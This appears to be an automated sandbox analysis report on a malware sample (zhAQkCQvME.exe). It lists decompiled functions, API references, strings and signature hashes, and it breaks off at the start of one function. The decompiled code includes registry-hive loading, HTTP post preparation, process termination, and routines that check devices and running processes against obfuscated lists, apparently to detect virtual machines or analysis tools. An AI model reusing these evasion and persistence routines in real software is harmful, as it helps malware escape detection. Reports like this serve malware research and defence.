						E0040DEC0(7,  &_v1284);
						_v760 = E00404CB0( &_v540);
						__imp__CoInitialize(0, 0x4187f0,  &_v1284, 0x4187f0,  &_v692, 0);
						_t81 = E0040DDA0(_v16, 0x415240, _v760, L"shell32.dll", E00408A50(__eflags, _t141, 0x4201bc, 1, 0x64));
						_t138 = _t131 + 0x4c;
						__eflags = _t81;
						if(_t81 >= 0) {
							while(1) {
								__eflags = 0;
								if(0 == 0) {
									break;
								}
							}
							_v552 = 0;
							L35:
							__imp__CoUninitialize();
							E00403F10( &_v760, 0xfffffffe);
							_t131 = _t138 + 8;
							goto L36;
						} else {
							goto L29;
						}
						while(1) {
							L29:
							__eflags = 0;
							if(0 == 0) {
								break;
							}
						}
						_v552 = 0xfffffffd;
						goto L35;
					}
					_t85 = E0040C9C0(_t100, 0x80000003, _v548, _v16);
					_t131 = _t131 + 0xc;
					_v552 = _t85;
					__eflags = _v552 - 0xffffffff;
					if(_v552 != 0xffffffff) {
						L20:
						goto L24;
					}
					_push(0);
					_push(L"NTUSER_DAT");
					_push(0x4187f0);
					_t86 = E00404CB0( &_v540);
					_t139 = _t131 + 0x10;
					_v556 = _t86;
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					_t88 = RegLoadKeyW(0x80000003, _v8, _v556);
					__eflags = _t88;
					if(_t88 == 0) {
						while(1) {
							__eflags = 0;
							if(0 == 0) {
								break;
							}
						}
						_t90 = E0040C9C0(_v16, 0x80000003, _v548, _v16);
						_t139 = _t139 + 0xc;
						_v552 = _t90;
						_t92 = RegUnLoadKeyW(0x80000003, _v8);
						__eflags = _t92;
						if(_t92 == 0) {
							L19:
							E00403F10( &_v556, 0xfffffffe);
							_t131 = _t139 + 8;
							goto L20;
						} else {
							goto L17;
						}
						while(1) {
							L17:
							__eflags = 0;
							if(0 == 0) {
								goto L19;
							}
						}
						goto L19;
					} else {
						goto L11;
					}
					while(1) {
						L11:
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					goto L19;
				}
				return 0xfffffffe;
			}

0x0040e7f0
0x0040e7f9
0x0040e803
0x0040e80a
0x0040e811
0x0040e81b
0x0040e825
0x0040e82c
0x0040e836
0x0040e846
0x0040e84b
0x0040e84e
0x0040e855
0x0040e864
0x0040e868
0x0040e869
0x0040e87b
0x0040e881
0x0040e889
0x0040e88a
0x0040e892
0x0040e893
0x0040e8a4
0x0040e8b1
0x0040e8b6
0x0040e8b9
0x0040e8b9
0x0040e8bb
0x00000000
0x00000000
0x0040e8bd
0x0040e8cf
0x0040e8d4
0x0040e8d7
0x0040e8dd
0x0040e8dd
0x0040e8e0
0x0040e9aa
0x0040e9b4
0x0040e9b4
0x0040e9b6
0x00000000
0x00000000
0x0040e9b8
0x0040e9ba
0x0040e9ba
0x0040e9c1
0x0040eac8
0x0040ead1
0x0040eadf
0x0040eaeb
0x0040eaf1
0x00000000
0x0040eaf1
0x0040e9c7
0x0040e9d1
0x0040e9d1
0x0040e9d3
0x00000000
0x00000000
0x0040e9d5
0x0040e9e2
0x0040e9e8
0x0040e9f6
0x0040ea0c
0x0040ea1d
0x0040ea4e
0x0040ea56
0x0040ea83
0x0040ea88
0x0040ea8b
0x0040ea8d
0x0040eaa1
0x0040eaa1
0x0040eaa3
0x00000000
0x00000000
0x0040eaa5
0x0040eaa7
0x0040eab1
0x0040eab1
0x0040eac0
0x0040eac5
0x00000000
0x00000000
0x00000000
0x00000000
0x0040ea8f
0x0040ea8f
0x0040ea8f
0x0040ea91
0x00000000
0x00000000
0x0040ea93
0x0040ea95
0x00000000
0x0040ea95
0x0040e8f6
0x0040e8fb
0x0040e8fe
0x0040e904
0x0040e90b
0x0040e9a8
0x00000000
0x0040e9a8
0x0040e911
0x0040e913
0x0040e918
0x0040e924
0x0040e929
0x0040e92c
0x0040e932
0x0040e932
0x0040e934
0x00000000
0x00000000
0x0040e936
0x0040e948
0x0040e94e
0x0040e950
0x0040e95a
0x0040e95a
0x0040e95c
0x00000000
0x00000000
0x0040e95e
0x0040e970
0x0040e975
0x0040e978
0x0040e987
0x0040e98d
0x0040e98f
0x0040e997
0x0040e9a0
0x0040e9a5
0x00000000
0x00000000
0x00000000
0x00000000
0x0040e991
0x0040e991
0x0040e991
0x0040e993
0x00000000
0x00000000
0x0040e995
0x00000000
0x00000000
0x00000000
0x00000000
0x0040e952
0x0040e952
0x0040e952
0x0040e954
0x00000000
0x00000000
0x0040e956
0x00000000
0x0040e958
0x00000000

APIs

ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 0040E869
RegLoadKeyW.ADVAPI32(80000003,00000000,00000000), ref: 0040E948
lstrcpyA.KERNEL32(?,0040EC8D,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040E9E2
lstrcatA.KERNEL32(?,015D081D,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040E9F6

Strings

NTUSER_DAT, xrefs: 0040E913
shell32.dll, xrefs: 0040EA6E

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: ConvertLoadStringlstrcatlstrcpy
String ID: NTUSER_DAT$shell32.dll
API String ID: 2449795608-1820152828
Opcode ID: e5958c493b0802f8511f1a1441389e7ef412ff3df93f20fe5bcfff0dc830ace1
Instruction ID: 8ad4e5a4821ff463d85c4c7df07c6546e5669d4c4fbec54272a5cb24c3d0ce3f
Opcode Fuzzy Hash: e5958c493b0802f8511f1a1441389e7ef412ff3df93f20fe5bcfff0dc830ace1
Instruction Fuzzy Hash: 2D8118B1D00205EBDB10DBA1EC49FEE7374AB48304F1046BEE519762C1EB789A918F99

Uniqueness

Uniqueness Score: 100.00%

Function 004110A0, Relevance: 16.8, APIs: 9, Strings: 2, Instructions: 334stringUNIQUE

Download Yara Rule

APIs

memset.MSVCRT ref: 00411114
memset.MSVCRT ref: 00411136
lstrlenA.KERNEL32(?,00000000,?), ref: 00411201
GetLastError.KERNEL32 ref: 00411297
GetLastError.KERNEL32 ref: 00411301
GetLastError.KERNEL32 ref: 004113B5
lstrlenA.KERNEL32(?,?,?), ref: 00411427
GetLastError.KERNEL32 ref: 00411480

Part of subcall function 00410F80: GetLastError.KERNEL32 ref: 00410FA5

GetLastError.KERNEL32 ref: 00411562

Strings

Content-Type: application/x-www-form-urlencoded, xrefs: 00411143
<, xrefs: 004111EA

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: ErrorLast$lstrlenmemset
String ID: <$Content-Type: application/x-www-form-urlencoded
API String ID: 4043594366-43375065
Opcode ID: dd0b40ede6d1ec824a589fcce6c9d446deb5add545e52c97a6feb8955127177f
Instruction ID: ae856c6abfb5aa7ff99efa70d2401bfaffb06d83f9501d183a0605003e36f1c1
Opcode Fuzzy Hash: dd0b40ede6d1ec824a589fcce6c9d446deb5add545e52c97a6feb8955127177f
Instruction Fuzzy Hash: C8E12CB5905218DBDB30CF60DC48BDEB7B5BB58304F1082EAE609A62A0D7785EC5CF59

Uniqueness

Uniqueness Score: 100.00%

Function 0040BB30, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 193
UNIQUE

Download Yara Rule

C-Code - Quality: 41%

			E0040BB30(intOrPtr _a4, intOrPtr _a8) {
				void* _v8;
				signed int _v12;
				int _v16;
				int _v20;
				CHAR* _v24;
				int _v28;
				void* _v40;
				void* _v44;
				int _v48;
				long _v52;
				long _v56;
				int _t65;
				CHAR* _t66;
				void* _t79;
				void* _t81;
				void* _t85;
				void* _t127;
				void* _t128;
				void* _t129;
				void* _t132;

				_v16 = 0;
				_v20 = 0;
				_v12 = 0;
				_v28 = 0;
				_v24 = 0;
				_t65 = E0040B9A0( &_v20);
				_t128 = _t127 + 4;
				_v16 = _t65;
				if(_v16 != 0) {
					_t66 = E00409AE0("zhAQkCQvME");
					_t129 = _t128 + 4;
					_v24 = _t66;
					if(_v24 != 0) {
						_v12 = 0;
						while(_v12 < _v20 && _v28 == 0) {
							_v48 = 0;
							while(0 != 0) {
							}
							_v48 = 0;
							L17:
							while(_v48 < 2 && _v28 == 0) {
								E00404120( &_v44,  &_v44, 0, 0x10);
								_t132 = _t129 + 0xc;
								while(1) {
									_v52 = 0;
									_v56 = 0;
									_t79 = E00404620(_v16,  *((intOrPtr*)(_v16 + _v12 * 4)),  &_v44);
									_t129 = _t132 + 8;
									if(_t79 < 0) {
										break;
									}
									_t81 = E0040BDA0( &_v44, _a4,  &_v44, _a8);
									_t129 = _t129 + 0xc;
									if(_t81 != 0) {
										_v8 = CreateEventA(0, 0, 0, _v24);
										if(_v8 != 0) {
											_v56 = GetLastError();
											while(0 != 0) {
											}
											if(_v56 != 0xb7) {
												L34:
												_t85 = E0040BEF0( &_v44,  &_v44);
												_t132 = _t129 + 4;
												if(_t85 != 0) {
													_v52 = WaitForSingleObject(_v8, 0x2710);
													if(_v52 != 0) {
														if(_v52 != 0x102) {
															while(0 != 0) {
															}
															L46:
															CloseHandle(_v8);
															if(0 != 0) {
																continue;
															}
															L47:
															if(_v44 == 0) {
																while(0 != 0) {
																}
																L57:
																_v48 = _v48 + 1;
																goto L17;
															}
															if(_v28 != 0) {
																L54:
																CloseHandle(_v40);
																CloseHandle(_v44);
																goto L57;
															}
															while(0 != 0) {
															}
															while(0 != 0) {
															}
															TerminateProcess(_v44, 0);
															goto L54;
														}
														while(0 != 0) {
														}
														goto L46;
													}
													while(0 != 0) {
													}
													_v28 = 1;
													goto L46;
												}
												CloseHandle(_v8);
												goto L47;
											}
											while(0 != 0) {
											}
											goto L34;
										}
										while(0 != 0) {
										}
										goto L47;
									}
									goto L47;
								}
								goto L47;
							}
							_v12 = _v12 + 1;
						}
						_v12 = 0;
						while(_v12 < _v20) {
							E00403F10(_v16 + _v12 * 4, 0xfffffffe);
							_t129 = _t129 + 8;
							_v12 = _v12 + 1;
						}
						E00403F10( &_v16, 0);
						E00403F10( &_v24, 0xffffffff);
						return _v28;
					}
					while(0 != 0) {
					}
					return 0;
				}
				while(0 != 0) {
				}
				return 0;
			}

0x0040bb36
0x0040bb3d
0x0040bb44
0x0040bb4b
0x0040bb52
0x0040bb5d
0x0040bb62
0x0040bb65
0x0040bb6c
0x0040bb80
0x0040bb85
0x0040bb88
0x0040bb8f
0x0040bb9e
0x0040bbb0
0x0040bbc6
0x0040bbcd
0x0040bbd1
0x0040bbd3
0x00000000
0x0040bbe5
0x0040bc01
0x0040bc06
0x0040bc09
0x0040bc09
0x0040bc10
0x0040bc25
0x0040bc2a
0x0040bc2f
0x00000000
0x00000000
0x0040bc42
0x0040bc47
0x0040bc4c
0x0040bc63
0x0040bc6a
0x0040bc7d
0x0040bc80
0x0040bc84
0x0040bc8d
0x0040bc95
0x0040bc99
0x0040bc9e
0x0040bca3
0x0040bcc0
0x0040bcc7
0x0040bcdf
0x0040bce9
0x0040bced
0x0040bcef
0x0040bcf3
0x0040bcfb
0x00000000
0x00000000
0x0040bd01
0x0040bd05
0x0040bd3b
0x0040bd3f
0x0040bd41
0x0040bbe2
0x00000000
0x0040bbe2
0x0040bd0b
0x0040bd25
0x0040bd29
0x0040bd33
0x00000000
0x0040bd33
0x0040bd0d
0x0040bd11
0x0040bd13
0x0040bd17
0x0040bd1f
0x00000000
0x0040bd1f
0x0040bce1
0x0040bce5
0x00000000
0x0040bce7
0x0040bcc9
0x0040bccd
0x0040bccf
0x00000000
0x0040bccf
0x0040bca9
0x00000000
0x0040bca9
0x0040bc8f
0x0040bc93
0x00000000
0x0040bc8f
0x0040bc6c
0x0040bc70
0x00000000
0x0040bc72
0x00000000
0x0040bc4e
0x00000000
0x0040bc31
0x0040bbad
0x0040bbad
0x0040bd4b
0x0040bd5d
0x0040bd71
0x0040bd76
0x0040bd5a
0x0040bd5a
0x0040bd81
0x0040bd8f
0x00000000
0x0040bd97
0x0040bb91
0x0040bb95
0x00000000
0x0040bb97
0x0040bb6e
0x0040bb72
0x00000000

APIs

TerminateProcess.KERNEL32(00000000,00000000), ref: 0040BD1F
CloseHandle.KERNEL32(?), ref: 0040BD29
CloseHandle.KERNEL32(00000000), ref: 0040BD33

Strings

zhAQkCQvME, xrefs: 0040BB7B

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: CloseHandle$ProcessTerminate
String ID: zhAQkCQvME
API String ID: 1541851893-2550356889
Opcode ID: ddfc1efdd3b5f0240393e93785edc1b02a88bd30a6811283d539a1ea8048a97a
Instruction ID: bbe6cc565256527889c18b49e8c5b6d0c9d2267ffbb6c4d5d67c07286181640b
Opcode Fuzzy Hash: ddfc1efdd3b5f0240393e93785edc1b02a88bd30a6811283d539a1ea8048a97a
Instruction Fuzzy Hash: 9C614B74D08209EBEB10CBA0D845BAEB771EF54304F20853BE512762C0DB7D9A459BDE

Uniqueness

Uniqueness Score: 100.00%

Function 00409FB0, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 47
libraryloaderUNIQUE

Download Yara Rule

C-Code - Quality: 37%

			E00409FB0() {
				intOrPtr _t2;
				struct HINSTANCE__* _t7;
				void* _t12;
				void* _t13;

				_t2 = E004074B0(GetCurrentProcess());
				_t13 = _t12 + 4;
				 *0x41f864 = _t2;
				while(0 != 0) {
				}
				 *0x42150c = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
				__eflags = GetModuleFileNameW(0, "C:\Users\Luke\Desktop\zhAQkCQvME.exe", 0x105);
				if(__eflags != 0) {
					_t7 = E00404730(__eflags, "C:\Users\Luke\Desktop\zhAQkCQvME.exe", 0x5c);
					_t13 = _t13 + 8;
					 *0x4213c4 = _t7;
				} else {
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					 *0x4213c4 = 0;
				}
				 *0x41fd7c = E00404730(__eflags, "C:\Users\Luke\Desktop\zhAQkCQvME.exe", 0x5c);
				E00404120(0, 0x41f760, 0, 0x9c);
				0x41f760->dwOSVersionInfoSize = 0x9c;
				return GetVersionExA(0x41f760);
			}

0x00409fba
0x00409fbf
0x00409fc2
0x00409fc7
0x00409fcb
0x00409fe4
0x00409ffb
0x00409ffd
0x0040a018
0x0040a01d
0x0040a020
0x00409fff
0x00409fff
0x00409fff
0x0040a001
0x00000000
0x00000000
0x0040a003
0x0040a005
0x0040a005
0x0040a034
0x0040a045
0x0040a04d
0x0040a063

APIs

GetCurrentProcess.KERNEL32(?,00402A9C), ref: 00409FB3

Part of subcall function 004074B0: OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 004074DC

GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,00402A9C), ref: 00409FD7
GetProcAddress.KERNEL32(00000000), ref: 00409FDE
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\zhAQkCQvME.exe,00000105), ref: 00409FF5
GetVersionExA.KERNEL32(0041F760), ref: 0040A05C

Part of subcall function 00404730: _wcschr.LIBCMTD ref: 0040474C

Strings

C:\Users\user\Desktop\zhAQkCQvME.exe, xrefs: 00409FEE, 0040A013
IsWow64Process, xrefs: 00409FCD
kernel32, xrefs: 00409FD2
C:\Users\user\Desktop\zhAQkCQvME.exe, xrefs: 0040A027

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: ModuleProcess$AddressCurrentFileHandleNameOpenProcTokenVersion_wcschr
String ID: C:\Users\user\Desktop\zhAQkCQvME.exe$C:\Users\user\Desktop\zhAQkCQvME.exe$IsWow64Process$kernel32
API String ID: 380517091-511900011
Opcode ID: 298e80ef6dc2e24a373d0204d57944051648a935846517861bc10f707ea57058
Instruction ID: 9e4d8cb471773d2d3e2f3f78ce18370f3dae62e8d6e4c33e407aa2e69325671a
Opcode Fuzzy Hash: 298e80ef6dc2e24a373d0204d57944051648a935846517861bc10f707ea57058
Instruction Fuzzy Hash: C10179B4A40704EAE3107F61BD0AFE63A605754706F54403BF609E51E2E6BC54554F1E

Uniqueness

Uniqueness Score: 100.00%

Function 0040A920, Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 177
UNIQUE

Download Yara Rule

C-Code - Quality: 40%

			E0040A920() {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v68;
				signed int _v72;
				char** _v76;
				signed int _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				signed int _v144;
				char* _v148;
				char* _v152;
				char* _v156;
				char* _v160;
				char* _t82;
				char* _t85;
				char* _t87;
				char* _t91;
				char* _t98;
				void* _t126;
				void* _t127;
				void* _t128;

				_v80 = 0;
				_v140 = 0x5c;
				_v136 = 0x16f0;
				_v132 = 0x1b5d;
				_v128 = 0x1849;
				_v124 = 0x1c7b;
				_v120 = 0x2868;
				_v116 = 0x1e91;
				_v112 = 0x1638;
				_v108 = 0x9a;
				_v104 = 0x22c1;
				_v100 = 0xab3;
				_v96 = 0x217;
				_v92 = 0x221d;
				_v88 = 0x9f;
				_v84 = 0x8f5;
				_v40 = 0x1cc2;
				_v36 = 0x222a;
				_v32 = 0x309;
				_v28 = 0x90a;
				_v24 = 0x1d72;
				_v20 = 0x58b;
				_v16 = 0x7d2;
				_v12 = 0x1994;
				_v8 = 0x2bcf;
				while(0 != 0) {
				}
				__imp__SetupDiGetClassDevsA(0, 0, 0, 6);
				_v76 = 0;
				if(_v76 != 0xffffffff) {
					_v68 = 0x1c;
					_v72 = 0;
					while(1) {
						_t82 =  &_v68;
						__imp__SetupDiEnumDeviceInfo(_v76, _v72, _t82);
						if(_t82 == 0) {
							break;
						}
						_v148 = 0;
						_v152 = 0;
						_t107 = _v76;
						_t85 = E0040AC10(_v76,  &_v68, 0);
						_t128 = _t127 + 0xc;
						_v148 = _t85;
						if(_v148 == 0) {
							L22:
							_t87 = E0040AC10(_v76,  &_v68, 4);
							_t127 = _t128 + 0xc;
							_v152 = _t87;
							if(_v152 == 0) {
								L34:
								if(_v80 <= 0) {
									if(_v80 <= 0) {
										_v72 = _v72 + 1;
										continue;
									}
									break;
								}
								break;
							}
							_v144 = 0;
							while(_v144 < 9) {
								_t91 = E00408060(_t107,  *((intOrPtr*)(_t126 + _v144 * 4 - 0x24)));
								_t127 = _t127 + 4;
								_v160 = _t91;
								if(_v160 == 0) {
									L32:
									_t107 = _v144 + 1;
									_v144 = _v144 + 1;
									continue;
								}
								if(StrStrIA(_v152, _v160) == 0) {
									E00408170( &_v160);
									_t127 = _t127 + 4;
									goto L32;
								}
								while(0 != 0) {
								}
								_v80 = 1;
								E00408170( &_v160);
								_t127 = _t127 + 4;
								break;
							}
							E00403F10( &_v152, 0);
							_t127 = _t127 + 8;
							goto L34;
						}
						_v144 = 0;
						while(_v144 < 0xf) {
							_t98 = E00408060( *((intOrPtr*)(_t126 + _v144 * 4 - 0x88)),  *((intOrPtr*)(_t126 + _v144 * 4 - 0x88)));
							_t128 = _t128 + 4;
							_v156 = _t98;
							if(_v156 == 0) {
								L20:
								_v144 = _v144 + 1;
								continue;
							}
							if(StrStrIA(_v148, _v156) == 0) {
								E00408170( &_v156);
								_t128 = _t128 + 4;
								goto L20;
							}
							while(0 != 0) {
							}
							_v80 = 1;
							E00408170( &_v156);
							_t128 = _t128 + 4;
							break;
						}
						_t107 =  &_v148;
						E00403F10( &_v148, 0);
						_t128 = _t128 + 8;
						goto L22;
					}
					__imp__SetupDiDestroyDeviceInfoList(_v76);
					while(0 != 0) {
					}
					return _v80;
				}
				while(0 != 0) {
				}
				return 0xffffffff;
			}

0x0040a929
0x0040a930
0x0040a93a
0x0040a944
0x0040a94b
0x0040a952
0x0040a959
0x0040a960
0x0040a967
0x0040a96e
0x0040a975
0x0040a97c
0x0040a983
0x0040a98a
0x0040a991
0x0040a998
0x0040a99f
0x0040a9a6
0x0040a9ad
0x0040a9b4
0x0040a9bb
0x0040a9c2
0x0040a9c9
0x0040a9d0
0x0040a9d7
0x0040a9de
0x0040a9e2
0x0040a9ec
0x0040a9f2
0x0040a9f9
0x0040aa09
0x0040aa10
0x0040aa22
0x0040aa22
0x0040aa2e
0x0040aa36
0x00000000
0x00000000
0x0040aa3c
0x0040aa46
0x0040aa56
0x0040aa5a
0x0040aa5f
0x0040aa62
0x0040aa6f
0x0040ab19
0x0040ab23
0x0040ab28
0x0040ab2b
0x0040ab38
0x0040abdf
0x0040abe3
0x0040abeb
0x0040aa1f
0x00000000
0x0040aa1f
0x00000000
0x0040abed
0x00000000
0x0040abe5
0x0040ab3e
0x0040ab59
0x0040ab6d
0x0040ab72
0x0040ab75
0x0040ab82
0x0040abc9
0x0040ab50
0x0040ab53
0x00000000
0x0040ab53
0x0040ab9a
0x0040abc1
0x0040abc6
0x00000000
0x0040abc6
0x0040ab9c
0x0040aba0
0x0040aba2
0x0040abb0
0x0040abb5
0x00000000
0x0040abb5
0x0040abd7
0x0040abdc
0x00000000
0x0040abdc
0x0040aa75
0x0040aa90
0x0040aaa7
0x0040aaac
0x0040aaaf
0x0040aabc
0x0040ab03
0x0040aa8a
0x00000000
0x0040aa8a
0x0040aad4
0x0040aafb
0x0040ab00
0x00000000
0x0040ab00
0x0040aad6
0x0040aada
0x0040aadc
0x0040aaea
0x0040aaef
0x00000000
0x0040aaef
0x0040ab0a
0x0040ab11
0x0040ab16
0x00000000
0x0040ab16
0x0040abf8
0x0040abfe
0x0040ac02
0x00000000
0x0040ac04
0x0040a9fb
0x0040a9ff
0x00000000

APIs

SetupDiGetClassDevsA.SETUPAPI(00000000,00000000,00000000,00000006), ref: 0040A9EC
SetupDiEnumDeviceInfo.SETUPAPI(000000FF,00000000,0000001C), ref: 0040AA2E
SetupDiDestroyDeviceInfoList.SETUPAPI(000000FF), ref: 0040ABF8

Part of subcall function 0040AC10: SetupDiGetDeviceRegistryPropertyA.SETUPAPI(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040AC47
Part of subcall function 0040AC10: GetLastError.KERNEL32 ref: 0040AC51

StrStrIA.SHLWAPI(00000000,00000000), ref: 0040AACC
StrStrIA.SHLWAPI(00000000,00000000), ref: 0040AB92

Strings

h(, xrefs: 0040A959
\, xrefs: 0040A930
*", xrefs: 0040A9A6

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: Setup$Device$Info$ClassDestroyDevsEnumErrorLastListPropertyRegistry
String ID: *"$\$h(
API String ID: 751695858-2928313126
Opcode ID: 27eb7b70c366f00895bf142e8eece382dfee21b3cb81dcb81b806411c30a550d
Instruction ID: 5dd7a245653ae4693e1f5c06c111050b7e9c2d5e5d0b7ab3c75cc45203e7b365
Opcode Fuzzy Hash: 27eb7b70c366f00895bf142e8eece382dfee21b3cb81dcb81b806411c30a550d
Instruction Fuzzy Hash: C37171B0D00318DBEB20CFA1D909BDEB774BB04308F1485AAD1097B2C1DB785A99DF56

Uniqueness

Uniqueness Score: 100.00%

Function 0040ACC0, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 88
processUNIQUE

Download Yara Rule

C-Code - Quality: 62%

			E0040ACC0() {
				char _v264;
				void* _v300;
				void* _v304;
				int _v308;
				intOrPtr _v312;
				intOrPtr _v316;
				intOrPtr _v320;
				intOrPtr _v324;
				signed int _v328;
				char* _v332;
				char* _t45;
				void* _t59;
				void* _t60;
				void* _t61;

				_v308 = 0;
				_v304 = 0xffffffff;
				_v324 = 0x23aa;
				_v320 = 0x1597;
				_v316 = 0x1f3e;
				_v312 = 0x50;
				while(0 != 0) {
				}
				_v304 = CreateToolhelp32Snapshot(2, GetCurrentProcessId());
				if(_v304 != 0xffffffff) {
					_t50 =  &_v300;
					memset( &_v300, 0, 0x128);
					_t61 = _t60 + 0xc;
					_v300 = 0x128;
					if(Process32First(_v304,  &_v300) != 0) {
						do {
							_v328 = 0;
							while(_v328 < 4) {
								_t45 = E00408060(_t50,  *((intOrPtr*)(_t59 + _v328 * 4 - 0x140)));
								_t61 = _t61 + 4;
								_v332 = _t45;
								if(_v332 == 0) {
									L14:
									_t50 = _v328 + 1;
									_v328 = _v328 + 1;
									continue;
								} else {
									if(StrStrIA( &_v264, _v332) == 0) {
										E00408170( &_v332);
										_t61 = _t61 + 4;
										goto L14;
									} else {
										while(0 != 0) {
										}
										_v308 = 1;
										E00408170( &_v332);
										_t61 = _t61 + 4;
									}
								}
								break;
							}
							if(_v308 == 0) {
								goto L16;
							}
							break;
							L16:
							_t50 = _v304;
						} while (Process32Next(_v304,  &_v300) != 0);
						CloseHandle(_v304);
						L18:
						while(0 != 0) {
						}
						return _v308;
					}
				}
				goto L18;
			}

0x0040acc9
0x0040acd3
0x0040acdd
0x0040ace7
0x0040acf1
0x0040acfb
0x0040ad05
0x0040ad09
0x0040ad1a
0x0040ad27
0x0040ad34
0x0040ad3b
0x0040ad40
0x0040ad43
0x0040ad63
0x0040ad69
0x0040ad69
0x0040ad84
0x0040ad9b
0x0040ada0
0x0040ada3
0x0040adb0
0x0040adfa
0x0040ad7b
0x0040ad7e
0x00000000
0x0040adb2
0x0040adc8
0x0040adf2
0x0040adf7
0x00000000
0x0040adca
0x0040adca
0x0040adce
0x0040add0
0x0040ade1
0x0040ade6
0x0040ade6
0x0040adc8
0x00000000
0x0040adb0
0x0040ae06
0x00000000
0x00000000
0x00000000
0x0040ae08
0x0040ae0f
0x0040ae1c
0x0040ae2b
0x00000000
0x0040ae31
0x0040ae35
0x0040ae40
0x0040ae40
0x0040ad63
0x00000000

APIs

GetCurrentProcessId.KERNEL32 ref: 0040AD0B
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040AD14
memset.MSVCRT ref: 0040AD3B
Process32First.KERNEL32(000000FF,00000128), ref: 0040AD5B
StrStrIA.SHLWAPI(?,00000000), ref: 0040ADC0
Process32Next.KERNEL32(000000FF,00000128), ref: 0040AE16
CloseHandle.KERNEL32(000000FF), ref: 0040AE2B

Strings

P, xrefs: 0040ACFB

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: Process32$CloseCreateCurrentFirstHandleNextProcessSnapshotToolhelp32memset
String ID: P
API String ID: 2672634495-3110715001
Opcode ID: e63f932395b2663c8532b9e2ff1015339b1696776cc9e395826e0e59df6cd982
Instruction ID: cbfcfb8e63d18fd65ecb8b32d2e99832a080f785eae4777aceca84fb29596c03
Opcode Fuzzy Hash: e63f932395b2663c8532b9e2ff1015339b1696776cc9e395826e0e59df6cd982
Instruction Fuzzy Hash: 7A314CB19003189BDB30DF60DC48BEEB7B5AF49305F0045EAE50D662D0DB389AA5CF5A

Uniqueness

Uniqueness Score: 100.00%

Function 0040AFB0, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 87
processUNIQUE

Download Yara Rule

C-Code - Quality: 62%

			E0040AFB0() {
